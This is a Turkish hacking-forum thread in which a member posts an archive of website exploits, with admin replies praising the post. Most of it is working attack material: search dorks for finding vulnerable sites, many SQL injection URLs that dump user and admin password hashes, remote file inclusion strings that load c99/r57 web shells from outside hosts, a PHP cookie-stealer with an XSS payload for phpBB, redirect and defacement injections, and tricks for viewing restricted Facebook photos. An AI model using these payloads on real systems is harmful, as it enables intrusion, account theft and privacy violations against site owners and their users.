index.php?option=com_joovideo&Itemid=S@BUN&task=de tail&id=-99999/**/union/**/select/**/000x3a000000011111111112222 2concat(username0x3apassword)/**/from/**/jos_users/*




AllMy-Guests Script Açığı

Açığı bulunan script: AllMyGuests
Google Dork: "powered by AllMyGuests" (Tırnaklar yok)

Example (Exploid): [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




123FlashChat Açığı

DORKS : "123flashchat.php"

EXPLOITS :
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




AlphaContent 2.5.8 © Açığı

DORK 1 : inurl: "com_alphacontent"

DORK 2 : "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"

Exploit :

index.php?option=com_alphacontent&section=6&cat=15 &task=view&id=-999999/**/union/**/select/**/1concat(username0x3epassword)34user()user() user()user()user()user()user()user()user() user()user()user()user()user()user()user()u ser()user()user()user()user()user()user()us er()user()user()user()user()user()user()use r()user()user()user()39/**/from/**/jos_users/*




Mambo Component (com-downloads) Açığı

DORK : allinurl :"com_downloads"filecatid

EXPLOIT :

index.php?option=com_downloads&Itemid=S@BUN&func=s electfolder&filecatid=-1/**/union/**/select/**/concat(username0x3apassword)concat(username0x3 apassword)concat(username0x3apassword)/**/from/**/mos_users/*




MiniNuke 2.1 Açığı

DORK 1 : allinurl:"members.asp?action"

DORK 2 : allinurl: "members.asp"uid

EXPLOIT 1 :

members.asp?action=member_details&uid=-1%20union%20select%200sifre00000kul_adi0s ifrekul_adisifre111sifre111isim1111 1111%20from%20members

EXPLOIT 2 :

members.asp?action=member_details&uid=-1%20union%20select%200000000sifre0sifre0 11sifre14sifre11112122222222%20 from%20members

EXPLLOIT 3 :

members.asp?action=member_details&uid=-1%20union%20select%2001sifre0000000111 111111122kul_adisifre2kul_adisifre2 22sifre333isim33333444%20from%20mem bers




Modules-Wepchat Açığı

DORK : allinurl :"modules/WebChat"

EXPLOIT :

modules/WebChat/index.php?roomid=-9999999/**/union/**/select/**/0uname0x3a0x3apass/**/from/**/exv2_users/*where%20exv2_admin%201




Modules-Repice Açığı

DORK : allinurl :"modules/recipe"

EXPLOIT :

modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2
Fselect/**/00unamepass111222+from%2F%2A%2A%2Fxoops_users/*




eXV2 MyAnnonces Açığı

DORK : eXV2 MyAnnonces

EXPLOIT :
modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-9999999/**/union/**/select/**/passpassuname0x3a0x3a0x3a0x3a0000x3a0x3 a1/**/from/**/exv2_users/*where%20exv2_admin%201




Modules-Dictionary Açığı

DORK 1 : allinurl: "modules/dictionary"

DORK 2 : allinurl: "modules/dictionary/print.php?id"

EXPLOIT :

modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname0x3apass)concat(uname0x3apass)/**/from/**/xoops_users/*

Geçerli versiyonlar;

Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch




Com-Restaurante Açığı

DORK : allinurl: "com_restaurante"

EXPLOIT :

index.php?option=com_restaurante&task=detail&Itemi d=S@BUN&id=-99999/**/union/**/select/**/000x3a0000000011121111111122 2222222233333333334444conca t(username0x3apassword)/**/from/**/jos_users/*




Com-Accombo Açığı

DORK : allinurl: "com_accombo"

EXPLOIT :

index.php?option=com_accombo&func=detail&Itemid=S@ BUN&id=-99999/**/union/**/select/**/010x3a3456789101112concat(username0x 3apassword)/**/from/**/mos_users/*




Powered By Runcms Açığı

DORK 1 : allinurl: "modules/photo/viewcat.php?id"

DORK 2 : inurlhoto "powered by runcms"

EXPLOIT :

admin/exploit

modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0uname/**/from/**/runcms_users/*

pass/exploit

modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0pass/**/from/**/runcms_users/*

Not: Admin/exploit'i site sonuna yapıştırırsak admin nick verir.
Pass/exploit'i yapıştırırsak md5 leri verir.

Admin girişi:
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




Powered By Download 3000 Açığı

DORK 1 : "Powered by Download 3000"

DORK 2 : allinurl: "com_d3000"

EXPLOiT :

index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0usernamepass_word/**/from/**/admin/*




Powered By Smoothflash Açığı

DORK 1 : "Powered by Smoothflash"

DORK 2 : allinurl: "admin_view_image.php"

EXPLOiT :

admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username0x3apassword)/**/from/**/lwsp_users




Com-Ahsshop Açığı

DORK : allinurl: "com_ahsshop"do=default

EXPLOiT 1 :

index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0concat(username0x3apassword)0x3a340x3a60 x3a/**/from/**/mos_users/*

EXPLOiT 2 :

index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username0x3apassword)1/**/from/**/mos_users/*




Mod-Archives Açığı

DORK : allinurl: "index.php?mod=archives"

EXPLOiT :

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0concat(pseudo0x3apass)2345concat(pseudo0 x3apass)78910111213/**/from/**/users/*

EXPLOiT 2:

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0concat(pseudo0x3apass)2345concat(pseudo0 x3apass)78910/**/from/**/users/*

EXPLOiT 3:

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0concat(pseudo0x3apass)2345concat(pseudo0 x3apass)7891011121314/**/from/**/users/*




Galery-Action Açığı

DORK : allinurl: "index.php?mod=galerie"action=gal

EXPLOiT :

index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/01concat(pseudo0x3apass)concat(pseudo0x3apa ss)4567/**/from/**/users/*




Powered By Site Sift Açığı

DORK 1 : powered by Site Sift

DORK 2 : allinurl: "index php go addpage"

DORK 3 : allinurl: "index.php?go=detail id="

EXPLOiT 1:

index.php?go=detail&id=-99999/**/union/**/select/**/01concat(username0x3apassword)34567891 0111213141516/**/from/**/admin/*

EXPLOİT 2:

index.php?go=detail&id=-99999/**/union/**/select/**/01concat(username0x3apassword)34567891 011121314151617181920/**/from/**/admin/*




Galery-İmg Açığı

DORK : allinurl: "index.php?p=gallerypic img_id"

EXPLOiT 1:

index.php?p=gallerypic&img_id=-1+union+select+012concat(email0x3apass)456 78+from+koobi4_user

EXPLOiT 2:

index.php?p=gallerypic&img_id=-1+union+select+012concat(email0x3apass)456 78+from+koobi_user




Galid-Galeri Açığı

DORK : allinurl: galid "index.php?p=gallerypic"

EXPLOiT :

index.php?p=gallerypic&img_id=S@BUN&galid=-1+union+select+0concat(email0x3apass)2+from+kp ro_user




Area-Galid Açığı

DORK : allinurl: "index.php?area"galid

EXPLOiT :

index.php?area=1&p=gallery&action=showimages&galid =-1+union+select+0concat(email0x3apass)2+from+kp ro_user




Shop-Categ Açığı

DORK : allinurl: "index php p shop"categ

EXPLOiT :

index.php?p=shop&show=showdetail&fid=S@BUN&categ=-1+union+select+0concat(email0x3apass)2+from+kp ro_user




Showlink Açığı

DORK : allinurl: "index.php?showlink"links

EXPLOiT :

index.php?showlink=BGH7&fid=BGH78&p=links&area=1&c ateg=-1+union+select+0concat(email0x3apass)2+from+kp ro_user
admin login=admin/login.php




RS MAXSOFT Açığı

DORK 1 : "RS MAXSOFT"

DORK 2 : "Provozováno na RS MAXSOFT"

EXPLOiT:

modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login0x3apass)+from+admin




PollBooth Açığı

DORK : allinurl: "pollBooth.php?op=results"pollID

EXPLOiT :

pollBooth.php?op=results&pollID=-1+union+select+password123+from+users




Showresult Açığı

DORK 1 : allinurl: "index.php?p=poll"showresult

DORK 2 : allinurl: poll_id "showresult"

EXPLOiT :

index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email0x3apass)123+from+ kpro_user




Fpdb/shop.mdb Açığı

google.com 'da aratacağız;
inurl:"mall/lobby.asp

Sonra çıkan sitenin sonuna ''fpdb/shop.mdb'' ekleyin "tırnaksız".

örnek: [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

mdb diye dosya çıktı farklı kaydet diyoruz ve açıyoruz...

mdb gizlenmiş şifreyi alıp md5 kırıcı sitede kırıyoruz ve siteye giriş yapıp hackliyoruz...




Xopps Açığı

Dork: inurl:/modules/wfsection/

Exploide:

print.php?articleid=9999999 union select 1111222233334444concat(char(11711510111411 09710910158)u*****char(11297115115119111 11410058)pass)66660000000000000 000000000 from xoops_users where uid like 1/*




Com_shambo2 Açığı

Dork(Googlede Aratacağımız Kod): "inurl:com_shambo2" (Tırnaklar yok.)

Exploid(Site Sonuna Ekleyeceğimiz Kod);

index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cconcat(username0x3apassword)%2C0%2C0% 2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F %2A%2A%2Ffrom%2F%2A%2A%2Fmos_users




PHP-Calendar Açığı

Arama : google.com => intitle:"EasyPHPCalendar

Site sonuna(Herhangi biri);

/calendar/calendar.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/functions/popup.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/datePicker.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/setupSQL.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps



Kanbolat:

Php-BB 2.0.18 Yönlendirme Açığı

öncelikle php destekli bi hostunuz olmalıdır. Google Free php host yazdığınız zaman bir sürü site çıkar. Şimdi yeni bi not defteri açın ve içine aynen bunları yazın. Ama en ufak bi kodlama hatasında sistem çalışmaz.

Kod:
<?php
$cookie = $_GET[’c’];
$ip = getenv (’REMOTE_ADDR’);
$date=date("j F Y g:i a");
$referer=getenv (’HTTP_REFERER’);
$fp = fopen(’cookies.txt’ ’a’);
fwrite($fp ’Cookie: ’.$cookie.’<br> IP: ’ .$ip. ’<br> Date and Time: ’ .$date. ’<br> Referer: ’.$referer.’<br><br><br>’);
fclose($fp);
?>

Bunu farklı kaydet diyip örneğin ismini cookies.php yapalım. Daha sonra ftp den bu dosyayı hostumuza atalım.

Şimdi bir tane daha not defteri açın içine hiçbirşey yazmayın. Onu da php olarak kaydedelim ve ismini örneğin gelencookieler.php yapalım. Bunu da hostumuza atalım. Ama bu boş bıraktığımız gelencookilere.php dosyasına CHMOD ayarı vereceğiz. Sağ tıklayıp CHMOD a gelelim ve 777 ye ayarlayalım yani "okuma" "yazma" ve "çalıştırma" izni vermiş olacaksınız.

Bunu da hallettikten sonra phpbb 2.0.18 kurulu hedef bi site bulalım. Forumlardan birine bi konu açalım veya imzanızada yazabilirsiniz.

Kod:
<pre a=’>’ onmouseover=’************************.location="ht tp://www.sizinsiteniz.com/cookies.php?c="+************************.cookie’ b=’<pre’ >

Bu kodu yazıyoruz. Daha sonra sizin imzanıza yada açtığınız konudaki kodu görenlerin cookiesi gelencookieler.php ye dizilecek.




FullXml Açıgı

1.adım: [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...] a giriyoruz "Fullxml" diye arama yapıyoruz

2.adım: Seçtiğimiz gözümüze kestirdiğimiz siteye girip sonunua /db/member.xml ekliyoruz.

3.adım: Eğer admin adı ve şifre sorarsa //db/member.xml ekleyerek devam ediyoruz ve orda kullanıcı adları ve şifreler çıkar

3.adım(2): Eger çıkmaz ise bu site dataları farklı yere saklamıştır. Bu site bu açıkla hacklenemez

4.adım: Eger girerseniz admin panelinden uploada bastığınız anda dosya upload etmeye geçersınız ordan index'inizi basarsınız.




Bx-cp 03 Açığı

Google Dork: "bxcp 03"
Karşımıza çıkan sitelerin sonuna şu nu yapıstırmalıyız;

Exploide:
index.php?mod=files&action=view&where=-1+UNION+SELECT+users_nick0users_pwd000000 000000+FROM+{pre}_users+WHERE+users_id=1

Yönetici nick vs hash-ları verir.

Md5 leri kırabilmeniz için sitelerden bazıları;

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




My-PhpNuke'de Açık

Sistemin kodlanması esnasında galeri modülünde yapılan kodlama hataları sisteme File Include atakları yapılmasına neden olmaktadır.

Code:
include ("$basepath/imageFunctions.php");

Exploit:
/gallery/displayCategory.php?basepath=http://evil_scripts?




ShotCat Açığı

google araması:

allinurl: "showCat.php?cat_id"

site sonuna eklenecek kod:

showCat.php?cat_id=-99999/**/union/**/select/**/0concat(user_name0x3apassword)2/**/from/**/std_users/*

Not: Md5 de kırma istemez
kullanıcı adları ve pass ları çıkar daha sonra menüde edit kısmı olur.




Com-Cinema Açığı

Aratılacak Kodumuz : allinurl: "com_cinema"

sitenin sonuna eklenecek kod:

index.php?option=com_cinema&Itemid=S@BUN&func=deta il&id=-99999/**/union/**/select/**/010x3a3456789101112131415161718 1920212223242526272829303132concat(u sername0x3apassword)/**/from/**/jos_users/*

Googlede arattıkdan sonra karşımıza gelen sayfadan her hyangi bir siteyi seçiyoruz vs sitenin sonuna eklenecek kod-u yapıştırıyoruz. MD5 ler elimizde .




Facebook Güvenlik Açıkları

A-)Avatar Açıkları;
Avatarı büyütme... Örnekle açıklayalım: profile.ak.facebook.com/profile5/605/84/s677609740 _9399.jpg Burada gördüğünüz s harfi small’dan geliyor. Eğer onu silip onun yerine n yani normal yazarsak profile.ak.facebook.com/profile5/605/84/n677609740 _9399.jpg bu resmi büyütüp kaydedebiliyoruz. Sadece bu kadar değil. Bu adresteki profile5/605/84 kısmı kişisel güvenlik kısmıdır ama s677609740 ise kişinin kimliği denilebilecek bir numara 9399 ise resmin ismidir. Aynı kullanıcının daha önce kullandığı avatarların tek farkı bu 9399 numarası olmasıdır. Bu avatarları Flashget’in batch download (toplu dosya indirme) özelliğini kısmına profile.ak.facebook.com/profile5/605/84/s677609740 _(*).jpg yazarak uzunluk olarak 4 karakterli sayılara karşılık gelen tüm avatarları bilgisayarımıza indirebiliyoruz.

B-)Kısıtlı Profili İzinsiz Açtırma;
Normalde profilleri arkadaşı olmayan kişiler tarafından görülmeyen hesaplar sadece mesaj yollanınca açılıyor. Örneğin adını duymadığınız bir kişi size bir mesaj atıyor; siz de doğal olarak cevaplıyorsunuz. Fakat siz mesajı attığınız anda mesajı attığınız kişi için profiliniz açık hale geliyor. Özellikleri kısıtlamış olsanız bile arkadaşlarınızı resimlerinizi görebiliyor.

C-)Albüm Fotoğraflarını Görme;
Kısıtlı profilleri açtık ama sadece bir kaç resim mi gözüküyor? Tüm albümü görmek de Facebook açıkları sayesinde problem olmuyor. Facebook kullananlar bilir fotoğraftaki kişileri kutu içine alıp bir şeyler yazılabiliyor. Ama bu büyük bir tehlike. Şifreleme iyi olmadığı için başka kişiler de fotoğraflarınızı görebiliyor.
Örneğin photos-571.11.facebook/photos-11-sf2p/v136/48/92/692548571/n692548571_340324_6962.j pg Bu Facebook’un fotoğraf yükleyen üyelerden birine verdiği bir adres. Sadece bu fotoğraf herkese açık diğerleri sadece arkadaşlarına açık. Yine buradaki photos-571 üye numarasının son 3 rakamı en sonraki n692548571_340324_6962.jpg ise resmin şifrelenmiş kısa yoludur.[n= normal 692548571= üye numarası 340324=fotoğraf numarası 6962=güvenlik numarası.]
Fakat burada fotoğraf numarasını bir artırır veya azaltır ve Flashget gibi programların batch download komutunu kullanırsak bu güvenliği kolayca geçebiliyoruz. Facebook bir resimden diğerine geçerken genelde önceki sayının 400 fazlasına yakın bir sayı üretiyor. Bu yüzden güvenliği kırmak en fazla 5 dakika sürüyor. Örneğin 340325 diğer yani 1 eksiği olan fotoğraf photos-571.11.facebook.com/photos-11-sf2p/v136/48/92/692548571/n692548571_340325_7760.j pg




Smf 1.1.4 RFI Bug Açığı

Google Dork : Powerd by SMF 1.1.4

Açık 1

/Sources/Subs-Graphics.php?settings[default_theme_dir]=http://jadlex.org/shell/c99.txt?

Açık 2

/Sources/Themes.php?settings[theme_dir]=http://jadlex.org/shell/c99.txt?




Phil-board Açıkları

google arama kodu : Powered by Philboard veya İnurl: philboard_forum.asp

İki şekildede aratabilirsiniz

adminin kullanıcı adı için

philboard_forum.asp?forumid=-1+union+select+0username2345678789101 112131415161718+from+users

parola için:

philboard_forum.asp?forumid=-1+union+select+0password2345678789101 112131415161718+from+users

yeni başlayanlar için elverişlidir

Dikkat= İyi bir anti-vir kullanmayanlar. Bazı siteler trojan örneği içermekte. Dikkatli olmanızı tafsiye ederim.




vBulletin Yönlendirme Açığı

vBulletin’de Her Sürümünde Top15 Açığı Bulunmuştur Aslında Bu Açık Çoktan Beri Var ama Bu zamanda Ortaya Çıkmış. Bir vBulletin Sitesine Giriyorsunuz Forum Anasayfasın da Top15 Varsa işe koyuluyoruz;

Şimdi Yeni Konu Açıyorsunuz( Nereye Açacağınız Fark Etmiyor)

ve

Konunun Başlıgına

">""************** http-********Refresh" **********0;url=http://www.siteadresi.com"> **** >

Yazmanız yeterli msj bölümüne istediğinizi yazın ...

Eğer açık kapatılmamış ise site yi yönlendirmiş olursunuz.


Bazı Yönlendirmeler;

Resim Çağırma;
<img xsrc=http://www.xxxx.com/resim.jpg>

swf iLe YönLendirme;
<embed xsrc=http://www.xxxx.com/xxxx.swf>

Css Çağırmak;
<link xhref=http://www.xxxx.com/dosya.css type=text/css rel=stylesheet>

Çerçeve (Frame) iLe index;
body topmargin=0 leftmargin=0 onload="************************.body.innerHTML='< iframe width=100% height=100% xsrc=http://www.xxxx.com></iframe>';">

StyLe iLe Tam Sayfa Resim Döşemek;
<body><style type=text/css>table p td tr{visibility:hidden;}body {background-color: #000000;background-image: url('http://www.xxxx.com/resim.jpg');}




Advanced Guestbook 2.4.2 Açığı

google dork: Advanced Guestbook 2.4.2 HTML code is enabled

eğer forumun en altında böyle bir yazı varsa= "HTML code is enabled" açık var demektir. Hemen yukardan sign the guestbook sekmesine tıklıyoruz.

Name yerine örnek nick yazıyoruz. Siz nickinizi yazın.

Aşağıya geliYoruz "your message" kısmına yönlendirme kodumuzu yazıyoruz;

****** http-********Refresh" **********0;url=http://www.siteadresiniz.com">

Sonra aşağıdaki güvenlik kodunu yazıP submit-e tıkllıyoruz.




Smf açıkları

Vuln:
Simple Machines SMF 1.1 rc2
Simple Machines SMF 1.0.8

Vuln Olmayanlar:
Simple Machines SMF 1.1 rc3
Simple Machines SMF 1.0.9

XSS:
http://www.example.com/index.php?action=login2">**********alert('turkhack in ')</script>

-------------------------------

Vuln
SMF 1.0.7 ve aşağısı 1.1rc2 ve aşağısı

Banlanan kullnıcılar ip spoof yapıp tekrar girebiliyor..

------------------------------------

Simple Machines Forum Version 1.1 RC3
Simple Machines Forum (SMF) ManageBoards.php cur_cat Variable SQL Injection

Sql injection mevcut
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

-----------------------------------
Simple Machines Forum <=1.1RC2 unset() vulnerabilities

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




Yeni joomla açıkları 3

Google Araması:
inurl:"com_zoom"

Site Sonuna:
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?

Site Sonuna:
/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?

Google Araması:
inurl:"com_serverstat"

Site Sonuna:
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=htt p://megaturks.by.ru/c99.txt?

Google Araması:
inurl:"com_fm"

Site Sonuna:
components/com_fm/fm.install.php?lm_absolute_path=http://megaturks.by.ru/c99.txt?

Google Araması:
inurl:com_mambelfish

Site Sonuna:
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.megaturks.com/images/shell.txt?

Google Araması:
inurl:com_lmo

Site Sonuna:
components/com_lmo/lmo.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Bazı joomla açıkları

Google Araması :
inurl:com_mosmedia veya index.php?option=com_mosmedia

Site Sonuna :
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://megaturks.by.ru/r57.txt?

Google Araması :
inurl:com_zoom veya index.php?option=com_zoom

Site Sonuna :
components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?

Google Araması:
allinurl:com_nfn_addressbook veya inurl:index.php?option=com_nfn_addressbook

Site Sonuna:
components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?

Site Sonuna2:
administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?

Google Araması:
inurl:com_moodle

Site Sonuna:
components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.megaturks.com/images/shell.txt?




detail.php?item_id==(SQL) açığı

Exploit in:
detail.php?item_id==(SQL)

Example:
(SQL)=-1%20union+select+123concat(user_name0x3apassw ord)56789101112131415161718192021 222324252627282930313233343536+from %20admin/*#




phpBB toplist.php açığı

Google arama

inurl:"toplist.php" "powered by phpbb"

aratıyoruz gelen sitelerin hepsinde deneyin ihtimal war

gelen sitelerde [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...] buradaki toplist.php önemli sitenin dizini değil sadede geçelim buradaki toplist.php nin yerine alttaki kodu ekliyoruz

toplist.php?f=toplist_top10&phpbb_root_path=Shell Adresiniz

ekledikten sonra Return ve o nadide sayfa ( Açık Warsa Tabi )

toplist.php yerine eklenecek kod örneği

toplist.php?f=toplist_top10&phpbb_root_path=http://kobaytm.3000mb.com/c99.txt?
____________________
'











Aynaya Bak Sonra Beni eLeştir
Burda ŞekiL Yapma Kendini geLiştir




ChaKMa_$eiTaN
endLesS isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 01-10-2009, 04:15 PM   #3
4MinoRMacH1Né
|~|~ ADMiN ~|~|
 
4MinoRMacH1Né - ait Kullanıcı Resmi (Avatar)
 
DF İstanbul-Avrupa Şubesi
Üyelik tarihi: Sep 2007
Kan Grubu: 0 RH (+) Cinsiyet:
Mesajlar: 42.916
Konu Sayısı: 10126
Ruh Hali:
Seviye: 100 [♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥]
Aktiflik: 3728 / 3728
Güç: 14305 / 20912
Deneyim: 42%
REP Puanı : -256
REP Seviyesi : 4MinoRMacH1Né is infamous around these parts4MinoRMacH1Né is infamous around these parts4MinoRMacH1Né is infamous around these parts
Standart ---> ÇeşitLi WebSite Açıkları Arşivim
of of

süper payLasım

+ rep
____________________



İnan!
.Ama yaLnızca biLdigin gerçekLere.
Güven!
.Ama yaLnızca içinde bagLadıkLarına.
Sev!
.Ama yaLnızca hak edenLeri.
PayLaş!
.Ama yaLnızca degerini biLenLerLe.
ÇaLış!
.Ama yaLnızca dogruluk yoLunda.
Yaşa!
.Ama sakın öLümü akLından çıkarma.
4MinoRMacH1Né isimli Üye şuanda online konumundadır   Alıntı ile Cevapla
Alt 01-10-2009, 04:21 PM   #4
endLesS
|~|~ ADMiN ~|~|
 
endLesS - ait Kullanıcı Resmi (Avatar)
 
DF İzmir Şubesi
Üyelik tarihi: May 2009
Kan Grubu: 0 RH (+) Cinsiyet:
Mesajlar: 24.411
Konu Sayısı: 4216
Seviye: 85 [♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥]
Aktiflik: 3167 / 3167
Güç: 7663 / 7663
Deneyim: 46%
REP Puanı : 70
REP Seviyesi : endLesS will become famous soon enough
Standart ---> ÇeşitLi WebSite Açıkları Arşivim
eyvallah heykırım
____________________
'











Aynaya Bak Sonra Beni eLeştir
Burda ŞekiL Yapma Kendini geLiştir




ChaKMa_$eiTaN
endLesS isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Cevapla


« önceki Konu | sonraki Konu »

Seçenekler
Stil
Normal Normal


Design ßy:OzKaN ®
Tüm Hakları DuSLeRFoRuM.ORG'a Aittir
Powered by vBulletin
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Forum SEO by Zoints
sesli chat | kopukforum | Emo Resimleri | forumlar |esra erol | forumlar | bal | Kalibrasyon | Kalibrasyon eğitimi | Engelli araç |Akülü araç
Tüm Hakları Saklıdır ©2006 - 2010 Site içeriği ve grafiklerimiz izinsiz ve kaynak gösterilmeden kullanılamaz.

alexa stats Forumlar, Forum, Eglence Forum Siteleri, Emo Resimleri, Ask Sevgi, Resimleri, Korku Forumları RSS Feeds - İletişim - Etiketler - Forumlar, Forum, Eglence Forum Siteleri, Emo Resimleri, Ask Sevgi, Resimleri, Korku Forumları - Arşiv